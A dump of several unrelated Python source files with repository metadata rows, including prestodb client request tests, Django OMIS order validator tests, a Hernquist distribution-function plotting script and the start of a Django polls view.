port=8080,
user=user,
source=source,
catalog=catalog,
schema=schema,
http_scheme='http',
session_properties={},
http_headers={
accept_encoding_header: accept_encoding_value,
client_info_header: client_info_value,
},
redirect_handler=None,
)
def assert_headers(headers):
assert headers[constants.HEADER_CATALOG] == catalog
assert headers[constants.HEADER_SCHEMA] == schema
assert headers[constants.HEADER_SOURCE] == source
assert headers[constants.HEADER_USER] == user
assert headers[constants.HEADER_SESSION] == ''
assert headers[accept_encoding_header] == accept_encoding_value
assert headers[client_info_header] == client_info_value
assert len(headers.keys()) == 8
req.post('URL')
assert_headers(post_recorder.kwargs['headers'])
req.get('URL')
assert_headers(get_recorder.kwargs['headers'])
def test_request_invalid_http_headers():
with pytest.raises(ValueError) as value_error:
PrestoRequest(
host='coordinator',
port=8080,
user='test',
http_headers={constants.HEADER_USER: 'invalid_header'},
)
assert str(value_error.value).startswith('cannot override reserved HTTP header')
def test_request_timeout():
timeout = 0.1
http_scheme = 'http'
host = 'coordinator'
port = 8080
url = http_scheme + '://' + host + ':' + str(port) + constants.URL_STATEMENT_PATH
def long_call(request, uri, headers):
time.sleep(timeout * 2)
return (200, headers, "delayed success")
httpretty.enable()
for method in [httpretty.POST, httpretty.GET]:
httpretty.register_uri(method, url, body=long_call)
# timeout without retry
for request_timeout in [timeout, (timeout, timeout)]:
req = PrestoRequest(
host=host,
port=port,
user='test',
http_scheme=http_scheme,
max_attempts=1,
request_timeout=request_timeout,
)
with pytest.raises(requests.exceptions.Timeout):
req.get(url)
with pytest.raises(requests.exceptions.Timeout):
req.post('select 1')
httpretty.disable()
httpretty.reset()
def test_presto_fetch_request(monkeypatch):
monkeypatch.setattr(PrestoRequest.http.Response, 'json', get_json_get_0)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
status = req.process(http_resp)
assert status.next_uri == RESP_DATA_GET_0['nextUri']
assert status.id == RESP_DATA_GET_0['id']
assert status.rows == RESP_DATA_GET_0['data']
def test_presto_fetch_request_with_cookie(monkeypatch):
monkeypatch.setattr(PrestoRequest.http.Response, 'json', get_json_get_0)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
http_resp.cookies['key'] = 'value'
req.process(http_resp)
assert req._http_cookies['key'] == 'value'
def test_presto_fetch_error(monkeypatch):
monkeypatch.setattr(
PrestoRequest.http.Response,
'json',
get_json_get_error_0,
)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
with pytest.raises(prestodb.exceptions.PrestoUserError) as exception_info:
req.process(http_resp)
error = exception_info.value
assert error.error_code == 1
assert error.error_name == 'SYNTAX_ERROR'
assert error.error_type == 'USER_ERROR'
assert error.error_exception == 'com.facebook.presto.sql.analyzer.SemanticException'
assert 'stack' in error.failure_info
assert len(error.failure_info['stack']) == 25
assert 'suppressed' in error.failure_info
assert error.message == 'line 1:15: Schema must be specified when session schema is not set'
assert error.error_location == (1, 15)
assert error.query_id == '20161116_205844_00002_xtnym'
@pytest.mark.parametrize("error_code, error_type, error_message", [
(503, prestodb.exceptions.Http503Error, 'service unavailable'),
(404, prestodb.exceptions.HttpError, 'error 404'),
])
def test_presto_connection_error(monkeypatch, error_code, error_type, error_message):
monkeypatch.setattr(
PrestoRequest.http.Response,
'json',
lambda x: {},
)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = error_code
with pytest.raises(error_type) as error:
req.process(http_resp)
assert error_message in str(error)
class RetryRecorder(object):
def __init__(self, error=None, result=None):
self.__name__ = 'RetryRecorder'
self._retry_count = 0
self._error = error
self._result = result
def __call__(self, *args, **kwargs):
self._retry_count += 1
if self._error is not None:
raise self._error
if self._result is not None:
return self._result
@property
def retry_count(self):
return self._retry_count
def test_authentication_fail_retry(monkeypatch):
post_retry = RetryRecorder(error=KerberosExchangeError())
monkeypatch.setattr(PrestoRequest.http.Session, 'post', post_retry)
get_retry = RetryRecorder(error=KerberosExchangeError())
monkeypatch.setattr(PrestoRequest.http.Session, 'get', get_retry)
attempts = 3
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
max_attempts=attempts,
)
with pytest.raises(KerberosExchangeError):
req.post('URL')
assert post_retry.retry_count == attempts
with pytest.raises(KerberosExchangeError):
req.get('URL')
assert post_retry.retry_count == attempts
def test_503_error_retry(monkeypatch):
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 503
post_retry = RetryRecorder(result=http_resp)
monkeypatch.setattr(PrestoRequest.http.Session, 'post', post_retry)
get_retry = RetryRecorder(result=http_resp)
monkeypatch.setattr(PrestoRequest.http.Session, 'get', get_retry)
attempts = 3
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
max_attempts=attempts,
)
req.post('URL')
assert post_retry.retry_count == attempts
req.get('URL')
assert post_retry.retry_count == attempts
class FakeGatewayResponse(object):
def __init__(self, http_response, redirect_count=1):
self.__name__ = 'FakeGatewayResponse'
self.http_response = http_response
self.redirect_count = redirect_count
self.count = 0
def __call__(self, *args, **kwargs):
self.count += 1
if self.count == self.redirect_count:
return self.http_response
http_response = PrestoRequest.http.Response()
http_response.status_code = 301
http_response.headers['Location'] = 'http://1.2.3.4:8080/new-path/'
assert http_response.is_redirect
return http_response
def test_gateway_redirect(monkeypatch):
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
gateway_response = FakeGatewayResponse(http_resp, redirect_count=3)
monkeypatch.setattr(PrestoRequest.http.Session, 'post', gateway_response)
monkeypatch.setattr(
socket,
'gethostbyaddr',
lambda *args: ('finalhost', ['finalhost'], '1.2.3.4'),
)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
)
result = req.post('http://host:80/path/')
assert gateway_response.count == 3
assert result.ok
| 32.292683
| 121
| 0.620493
|
be0a8311d1c083503acc97fd3cdf6cfc9ded10ed
| 24,756
|
py
|
Python
|
datahub/omis/order/test/test_validators.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
datahub/omis/order/test/test_validators.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
datahub/omis/order/test/test_validators.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
from unittest import mock
import pytest
from django.db.models import Sum
from rest_framework.exceptions import ValidationError
from datahub.core.exceptions import APIConflictException
from datahub.omis.order.constants import OrderStatus, VATStatus
from datahub.omis.order.models import Order
from datahub.omis.order.test.factories import (
OrderFactory,
OrderWithCancelledQuoteFactory,
OrderWithOpenQuoteFactory,
)
from datahub.omis.order.validators import (
AssigneesFilledInSubValidator,
CancellableOrderSubValidator,
CompletableOrderSubValidator,
ContactWorksAtCompanyValidator,
NoOtherActiveQuoteExistsSubValidator,
OrderDetailsFilledInSubValidator,
OrderEditableFieldsValidator,
OrderInStatusRule,
OrderInStatusSubValidator,
OrderInStatusValidator,
VATSubValidator,
)
class TestContactWorksAtCompanyValidator:
"""Tests for ContactWorksAtCompanyValidator."""
def test_contact_from_company(self):
"""
Test that if the contact specified in data works
at the company specified in data, the validation passes.
"""
serializer = mock.Mock()
company = serializer.instance.company
new_contact = mock.Mock(company=company)
validator = ContactWorksAtCompanyValidator()
data = {
'contact': new_contact,
'company': company,
}
try:
validator(data, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_contact_not_from_company(self):
"""
Test that if the contact specified in data doesn't works
at the company specified in data, the validation fails.
"""
serializer = mock.Mock()
company = serializer.instance.company
new_contact = mock.Mock() # doesn't work at `company`
validator = ContactWorksAtCompanyValidator()
data = {
'contact': new_contact,
'company': company,
}
with pytest.raises(ValidationError):
validator(data, serializer)
def test_with_different_field_names(self):
"""
Test that the validation passes when using different field names.
"""
serializer = mock.Mock()
company = serializer.instance.company
new_main_contact = mock.Mock(company=company)
validator = ContactWorksAtCompanyValidator(
contact_field='main_contact',
company_field='main_company',
)
data = {
'main_contact': new_main_contact,
'main_company': company,
}
try:
validator(data, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestAssigneesFilledInSubValidator:
"""Tests for the AssigneesFilledInSubValidator."""
def test_no_assignees_fails(self):
"""Test that the validation fails if the order doesn't have any assignees."""
order = OrderFactory(assignees=[])
validator = AssigneesFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'assignees': ['You need to add at least one assignee.'],
}
def test_no_lead_assignee_fails(self):
"""Test that the validation fails if there's no lead assignee."""
order = OrderFactory()
order.assignees.update(is_lead=False)
validator = AssigneesFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'assignee_lead': ['You need to set a lead assignee.'],
}
def test_no_estimated_time_fails(self):
"""
Test that the validation fails if the combined estimated time of the assignees
is zero.
"""
order = OrderFactory()
order.assignees.update(estimated_time=0)
validator = AssigneesFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'assignee_time': ['The total estimated time cannot be zero.'],
}
def test_non_zero_estimated_time_succeeds(self):
"""
Test that the validation succeeds if the combined estimated time of the assignees
is greater than zero.
"""
order = OrderFactory()
assert order.assignees.aggregate(sum=Sum('estimated_time'))['sum'] > 0
validator = AssigneesFilledInSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestOrderDetailsFilledInSubValidator:
"""Tests for the OrderDetailsFilledInSubValidator."""
@pytest.mark.parametrize('values_as_data', (True, False))
def test_incomplete_order(self, values_as_data):
"""
Test that an incomplete order doesn't pass the validation.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'primary_market': None,
'description': '',
'delivery_date': None,
'vat_status': '',
}
order_m2m_fields = {
'service_types': [],
}
if values_as_data:
order = Order()
data = {**order_fields, **order_m2m_fields}
else:
order = Order(**order_fields)
for k, v in order_m2m_fields.items():
getattr(order, k).set(v)
data = {}
validator = OrderDetailsFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
all_fields = list(order_fields) + list(order_m2m_fields)
assert exc.value.detail == {
**{field: ['This field is required.'] for field in all_fields},
'assignees': ['You need to add at least one assignee.'],
}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_complete_order(self, values_as_data):
"""
Test that a complete order passes the validation.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
random_values = OrderFactory() # used only to set up the related props easily
order_fields = {
'primary_market': random_values.primary_market,
'service_types': random_values.service_types.all(),
'description': random_values.description,
'delivery_date': random_values.delivery_date,
'vat_status': random_values.vat_status,
}
order = OrderFactory(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = OrderDetailsFilledInSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_validation_errors_appended(self):
"""
Test that if a field gets more than one error during the validation,
the errors are appended to the same list and not overridden by other validators.
"""
order = OrderFactory()
with mock.patch.object(
OrderDetailsFilledInSubValidator,
'get_extra_validators',
) as get_extra_validators:
# trigger a second validation error on the same field
get_extra_validators.return_value = [
mock.Mock(
side_effect=ValidationError({
'description': ['A different error...'],
}),
),
]
validator = OrderDetailsFilledInSubValidator()
with pytest.raises(ValidationError) as exc:
validator(
data={
'description': '',
},
order=order,
)
assert exc.value.detail == {
'description': [
'This field is required.',
'A different error...',
],
}
@pytest.mark.django_db
class TestNoOtherActiveQuoteExistsSubValidator:
"""Tests for the NoOtherActiveQuoteExistsSubValidator."""
def test_with_existing_active_quote(self):
"""Test that if there's already an active quote, the validation fails."""
order = OrderWithOpenQuoteFactory()
validator = NoOtherActiveQuoteExistsSubValidator()
with pytest.raises(APIConflictException):
validator(order=order)
def test_without_any_active_quote(self):
"""Test that if there isn't any active quote, the validation passes."""
order = OrderFactory()
validator = NoOtherActiveQuoteExistsSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_with_cancelled_quote(self):
"""Test that if there is a cancelled quote, the validation passes."""
order = OrderWithCancelledQuoteFactory()
validator = NoOtherActiveQuoteExistsSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestOrderInStatusSubValidator:
"""Tests for the OrderInStatusSubValidator."""
def test_validation_passes(self):
"""
Test that the validation passes if order.status is one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusSubValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
)
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_validation_fails(self):
"""
Test that the validation fails if order.status is NOT one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusSubValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.cancelled,
),
)
with pytest.raises(APIConflictException):
validator(order=order)
def test_order_not_required(self):
"""
Test that if order_required == False and the order passed in is None,
the validation passes.
"""
validator = OrderInStatusSubValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
order_required=False,
)
try:
validator()
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.django_db
class TestOrderInStatusValidator:
"""Tests for the OrderInStatusValidator."""
@pytest.mark.parametrize(
'serializer_factory',
(
lambda order: mock.Mock(instance=order, context={}),
lambda order: mock.Mock(context={'order': order}),
),
)
def test_validation_passes(self, serializer_factory):
"""
Test that the validation passes if order.status is one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
)
serializer = serializer_factory(order)
try:
validator({}, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.parametrize(
'serializer_factory',
(
lambda order: mock.Mock(instance=order, context={}),
lambda order: mock.Mock(context={'order': order}),
),
)
def test_validation_fails(self, serializer_factory):
"""
Test that the validation fails if order.status is NOT one of the allowed statuses.
"""
order = OrderFactory(status=OrderStatus.complete)
validator = OrderInStatusValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.cancelled,
),
)
serializer = serializer_factory(order)
with pytest.raises(APIConflictException):
validator({}, serializer)
def test_order_not_required(self):
"""
Test that if order_required == False and the order passed in is None,
the validation passes.
"""
validator = OrderInStatusValidator(
allowed_statuses=(
OrderStatus.draft,
OrderStatus.complete,
OrderStatus.cancelled,
),
order_required=False,
)
serializer = mock.Mock(instance=None, context={})
try:
validator({}, serializer)
except Exception:
pytest.fail('Should not raise a validator error.')
class TestVATSubValidator:
"""Tests for the VATSubValidator."""
@pytest.mark.parametrize('values_as_data', (True, False))
def test_nothing_specified_fails(self, values_as_data):
"""
Test that if none of the vat fields are specified, it raises a ValidationError.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': '',
'vat_number': '',
'vat_verified': None,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
assert exc.value.detail == {'vat_status': ['This field is required.']}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_only_status_eu_specified_fails(self, values_as_data):
"""
Test that if only vat_status = eu is specified, it raises a ValidationError
as vat_verified (true or false) has to be specified as well.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '',
'vat_verified': None,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
assert exc.value.detail == {'vat_verified': ['This field is required.']}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_only_status_eu_verified_true_specified_fails(self, values_as_data):
"""
Test that if vat_status = eu and vat_verified = True but vat_number is not specified,
it raises a ValidationError.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '',
'vat_verified': True,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
with pytest.raises(ValidationError) as exc:
validator(data=data, order=order)
assert exc.value.detail == {'vat_number': ['This field is required.']}
@pytest.mark.parametrize('values_as_data', (True, False))
def test_complete_verified_eu_vat_succeeds(self, values_as_data):
"""
Test that if vat_status = eu, vat_verified = True and vat_number is specified,
the validation passes.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '0123456789',
'vat_verified': True,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.parametrize('values_as_data', (True, False))
def test_only_status_eu_verified_false_specified_succeeds(self, values_as_data):
"""
Test that if vat_status = eu, vat_verified = False and vat_number is not specified,
the validation passes and vat_number is not required when vat_verified is False.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': VATStatus.eu,
'vat_number': '',
'vat_verified': False,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
@pytest.mark.parametrize('values_as_data', (True, False))
@pytest.mark.parametrize('vat_status', (VATStatus.outside_eu, VATStatus.uk))
def test_only_status_non_eu_succeeds(self, values_as_data, vat_status):
"""
Test that if vat_status != eu, the validation passes even if the other
fields are empty.
Test both scenarios:
- with fields on the instance (values_as_data=False)
- with fields as values in the data param (values_as_data=True)
"""
order_fields = {
'vat_status': vat_status,
'vat_number': '',
'vat_verified': None,
}
order = Order(**(order_fields if not values_as_data else {}))
data = order_fields if values_as_data else {}
validator = VATSubValidator()
try:
validator(data=data, order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
class TestCompletableOrderSubValidator:
"""Tests for the CompletableOrderSubValidator."""
def test_ok_with_all_actual_time_fields_set(self):
"""
Test that the validation succeeds when all assignee.actual_time fields are set.
"""
order = mock.MagicMock()
order.assignees.all.return_value = (
mock.MagicMock(actual_time=100), mock.MagicMock(actual_time=0),
)
validator = CompletableOrderSubValidator()
try:
validator(order=order)
except Exception:
pytest.fail('Should not raise a validator error.')
def test_fails_if_not_all_actual_time_fields_set(self):
"""
Test that the validation fails if not all assignee.actual_time fields are set.
"""
order = mock.MagicMock()
order.assignees.all.return_value = (
mock.MagicMock(actual_time=100), mock.MagicMock(actual_time=None),
)
validator = CompletableOrderSubValidator()
with pytest.raises(ValidationError) as exc:
validator(order=order)
assert exc.value.detail == {
'non_field_errors': (
'You must set the actual time for all assignees '
'to complete this order.'
),
}
class TestCancellableOrderSubValidator:
"""Tests for the CancellableOrderSubValidator."""
@pytest.mark.parametrize(
'order_status,force,should_pass',
(
# with force=False
(OrderStatus.draft, False, True),
(OrderStatus.quote_awaiting_acceptance, False, True),
(OrderStatus.quote_accepted, False, False),
(OrderStatus.paid, False, False),
(OrderStatus.complete, False, False),
(OrderStatus.cancelled, False, False),
# with force=True
(OrderStatus.draft, True, True),
(OrderStatus.quote_awaiting_acceptance, True, True),
(OrderStatus.quote_accepted, True, True),
(OrderStatus.paid, True, True),
(OrderStatus.complete, True, False),
(OrderStatus.cancelled, True, False),
),
)
def test_validation(self, order_status, force, should_pass):
"""Test the validator with different order status and force values."""
order = Order(status=order_status)
validator = CancellableOrderSubValidator(force=force)
if should_pass:
validator(order=order)
else:
with pytest.raises(APIConflictException):
validator(order=order)
@pytest.mark.parametrize(
'order_status,expected_status,res',
(
(OrderStatus.draft, OrderStatus.draft, True),
(OrderStatus.draft, OrderStatus.paid, False),
),
)
def test_order_in_status_rule(order_status, expected_status, res):
"""Tests for OrderInStatusRule."""
order = mock.Mock(status=order_status)
combiner = mock.Mock()
combiner.serializer.context = {'order': order}
rule = OrderInStatusRule(expected_status)
assert rule(combiner) == res
class TestOrderEditableFieldsValidator:
"""Tests for the OrderEditableFieldsValidator."""
@pytest.mark.parametrize(
'order_status,mapping,data,should_pass',
(
# allowed field => OK
(
OrderStatus.draft,
{OrderStatus.draft: {'description'}},
{'description': 'lorem ipsum'},
True,
),
# disallowed field => Fail
(
OrderStatus.draft,
{OrderStatus.draft: {'contact'}},
{'description': 'lorem ipsum'},
False,
),
# status not in mapping => OK
(
OrderStatus.draft,
{OrderStatus.paid: {'contact'}},
{'description': 'lorem ipsum'},
True,
),
# disallowed field didn't change => OK
(
OrderStatus.draft,
{OrderStatus.draft: {'contact'}},
{'description': 'original description'},
True,
),
# nothing allowed => Fail
(
OrderStatus.draft,
{OrderStatus.draft: {}},
{'description': 'lorem ipsum'},
False,
),
),
)
def test_validation_with_order(self, order_status, mapping, data, should_pass):
"""Test the validator with different order status, mapping and data."""
order = Order(
status=order_status,
description='original description',
)
serializer = mock.Mock(instance=order)
validator = OrderEditableFieldsValidator(mapping)
if should_pass:
validator(data, serializer)
else:
with pytest.raises(ValidationError):
validator(data, serializer)
def test_validation_passes_on_creation(self):
"""Test that the validation passes if we are creating the order instead of editing it."""
serializer = mock.Mock(instance=None)
validator = OrderEditableFieldsValidator({OrderStatus.paid: {'contact'}})
validator({'description': 'lorem ipsum'}, serializer)
| 32.876494
| 97
| 0.605025
|
f2ebd39d561cc31e1ad600b9e13e6f9160415c77
| 6,382
|
py
|
Python
|
figures/fig1_iso.py
|
aneeshnaik/HernquistFlows
|
7f81f9b47297b115ae6b593593aac59afafc48b3
|
[
"MIT"
] | null | null | null |
figures/fig1_iso.py
|
aneeshnaik/HernquistFlows
|
7f81f9b47297b115ae6b593593aac59afafc48b3
|
[
"MIT"
] | null | null | null |
figures/fig1_iso.py
|
aneeshnaik/HernquistFlows
|
7f81f9b47297b115ae6b593593aac59afafc48b3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Figure 1: Isotropic Hernquist DF.
Created: May 2021
Author: A. P. Naik
"""
import sys
import numpy as np
import matplotlib.pyplot as plt
import copy
from os.path import exists
sys.path.append("../src")
from constants import M_sun, kpc, G, pi
from hernquist import calc_DF_iso
from ml import load_flow, calc_DF_ensemble
def get_f_exact(rgrid, vgrid, M, a):
"""Get exact Hernquist DF evaluated on r/v grids."""
# deproject grids into 6D
N_bins = rgrid.shape[0]
dr = np.diff(rgrid[0, :], axis=0)[0]
dv = np.diff(vgrid[:, 0], axis=0)[0]
x = rgrid.reshape(N_bins**2)
vx = vgrid.reshape(N_bins**2)
zeroes = np.zeros_like(x)
q = np.stack((x, zeroes, zeroes), axis=-1)
p = np.stack((vx, zeroes, zeroes), axis=-1)
# evaluate DF
f_exact = calc_DF_iso(q, p, M, a).reshape(N_bins, N_bins)
# renormalise; expected fraction of particles in each bin
f_exact = 16 * pi**2 * f_exact * rgrid**2 * vgrid**2 * dr * dv
return f_exact
def get_f_data(r_bin_edges, v_bin_edges):
"""Get mock Hernquist sample histogrammed into r v grids."""
# load data
data = np.load('../data/hq_iso_orig.npz')
pos = data['pos']
vel = data['vel']
# get histogram
r = np.linalg.norm(pos, axis=-1)
v = np.linalg.norm(vel, axis=-1)
bins = [r_bin_edges / kpc, v_bin_edges / 1000]
H, _, _ = np.histogram2d(r / kpc, v / 1000, bins=bins)
f_data = H.T / 1e+6
return f_data
def get_f_model(rgrid, vgrid, M, a):
"""Get reconstructed Hernquist DF evaluated on r/v grids."""
# deproject grids into 6D
N_bins = rgrid.shape[0]
dr = np.diff(rgrid[0, :], axis=0)[0]
dv = np.diff(vgrid[:, 0], axis=0)[0]
x = rgrid.reshape(N_bins**2)
vx = vgrid.reshape(N_bins**2)
zeroes = np.zeros_like(x)
q = np.stack((x, zeroes, zeroes), axis=-1)
p = np.stack((vx, zeroes, zeroes), axis=-1)
# units
u_q = 10 * a
u_p = np.sqrt(2 * G * M / a)
u_f = u_q**3 * u_p**3
# load flows
n_flows = 30
flows = []
for i in range(n_flows):
fname = f"../nflow_models/hq_iso_orig/{i}_best.pth"
flows.append(load_flow(fname, 6, 8, 64))
# evaluate DF
f_model = calc_DF_ensemble(q, p, u_q, u_p, flows).reshape(N_bins, N_bins)
# renormalise; expected fraction of particles in each bin
f_model = 16 * pi**2 * f_model * rgrid**2 * vgrid**2 * dr * dv / u_f
return f_model
if __name__ == '__main__':
# Hernquist params and scaling units
M = 1e+10 * M_sun
a = 5 * kpc
u_pos = 10 * a
u_vel = np.sqrt(2 * G * M / a)
# grid dims
r_max = 5.5 * a
v_max = np.sqrt(2 * G * M / a)
N_bins = 128
# check if plot data exists, otherwise generate
dfile = "fig1_data.npz"
if not exists(dfile):
# define r/v bins in which to evaluate DF
r_bin_edges = np.linspace(0, r_max, N_bins + 1)
v_bin_edges = np.linspace(0, v_max, N_bins + 1)
r_cen = 0.5 * (r_bin_edges[1:] + r_bin_edges[:-1])
v_cen = 0.5 * (v_bin_edges[1:] + v_bin_edges[:-1])
rgrid, vgrid = np.meshgrid(r_cen, v_cen)
dr = r_max / N_bins
dv = v_max / N_bins
# f_ref
x0 = np.array([a, 0, 0])
v0 = np.array([v_max / 4, 0, 0])
f_ref = calc_DF_iso(x0, v0, M, a)
f_ref = 16 * pi**2 * f_ref * a**2 * (v_max / 4)**2 * dr * dv
# get various DFs
f_exact = get_f_exact(rgrid, vgrid, M, a) / f_ref
f_data = get_f_data(r_bin_edges, v_bin_edges) / f_ref
f_model = get_f_model(rgrid, vgrid, M, a) / f_ref
# calculate residuals
with np.errstate(divide='ignore', invalid='ignore'):
res = np.divide((f_model - f_exact), f_exact)
# save data file
np.savez(
dfile, f_exact=f_exact, f_data=f_data, f_model=f_model, res=res
)
else:
# load data file
data = np.load(dfile)
f_exact = data['f_exact']
f_model = data['f_model']
f_data = data['f_data']
res = data['res']
# set up figure
fig = plt.figure(figsize=(6.9, 3), dpi=150)
left = 0.065
right = 0.98
bottom = 0.125
top = 0.83
dX = (right - left) / 4
dY = (top - bottom)
CdY = 0.05
# plot settings
plt.rcParams['text.usetex'] = True
plt.rcParams['font.family'] = 'serif'
plt.rcParams['font.size'] = 9
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['xtick.labelsize'] = 8
labels = ['Exact', 'Data', 'Model', 'Residuals']
cmap = copy.copy(plt.cm.bone)
cmap.set_under('white')
vmin = 0.00001
vmax = 1.3
extent = [0, r_max / a, 0, 1]
iargs1 = {'origin': 'lower', 'cmap': cmap, 'vmin': vmin, 'vmax': vmax,
'extent': extent, 'aspect': 'auto'}
iargs2 = {'origin': 'lower', 'extent': extent, 'vmin': -0.75, 'vmax': 0.75,
'cmap': 'Spectral_r', 'aspect': 'auto'}
# loop over panels
for i in range(4):
# set up axes
ax = fig.add_axes([left + i * dX, top - dY, dX, dY])
# get relevant DF
if i == 0:
f = np.copy(f_exact)
elif i == 1:
f = np.copy(f_data)
elif i == 2:
f = np.copy(f_model)
else:
f = np.copy(res)
# plot DF
if i == 3:
im1 = ax.imshow(res, **iargs2)
else:
im0 = ax.imshow(f, **iargs1)
# text
ax.text(0.97, 0.96, labels[i], ha='right', va='top',
transform=ax.transAxes)
# ticks, axis labels etc.
ax.tick_params(top=True, right=True, direction='inout')
if i == 0:
ax.set_ylabel(r"$v\ /\ v_\mathrm{esc}(r=0)$")
else:
ax.tick_params(labelleft=False)
if i == 2:
ax.set_xlabel(r"$r\ /\ a$")
ax.xaxis.set_label_coords(0, -0.1)
# colourbars
cax0 = fig.add_axes([left, top, 3 * dX, CdY])
cax1 = fig.add_axes([left + 3 * dX, top, dX, CdY])
plt.colorbar(im0, cax=cax0, orientation='horizontal')
plt.colorbar(im1, cax=cax1, orientation='horizontal')
cax0.set_xlabel(r"$F / F_\mathrm{ref}$")
cax1.set_xlabel(r"Model / Exact - 1")
for cax in [cax0, cax1]:
cax.xaxis.set_ticks_position('top')
cax.xaxis.set_label_position('top')
# save
fig.savefig("fig1_iso.pdf")
| 29.275229
| 79
| 0.56205
|
890be8cb708e51757880132205b02b1b17afa102
| 1,555
|
py
|
Python
|
django_1.8_tutorial/mysite/polls/views.py
|
TecKnow/learning
|
71d1ddf9d580027ecc62a067581da378a9e85f6d
|
[
"BSD-3-Clause"
] | null | null | null |
django_1.8_tutorial/mysite/polls/views.py
|
TecKnow/learning
|
71d1ddf9d580027ecc62a067581da378a9e85f6d
|
[
"BSD-3-Clause"
] | null | null | null |
django_1.8_tutorial/mysite/polls/views.py
|
TecKnow/learning
|
71d1ddf9d580027ecc62a067581da378a9e85f6d
|
[
"BSD-3-Clause"
] | null | null | null |
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.views import generic
from .models import Choice, Question
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
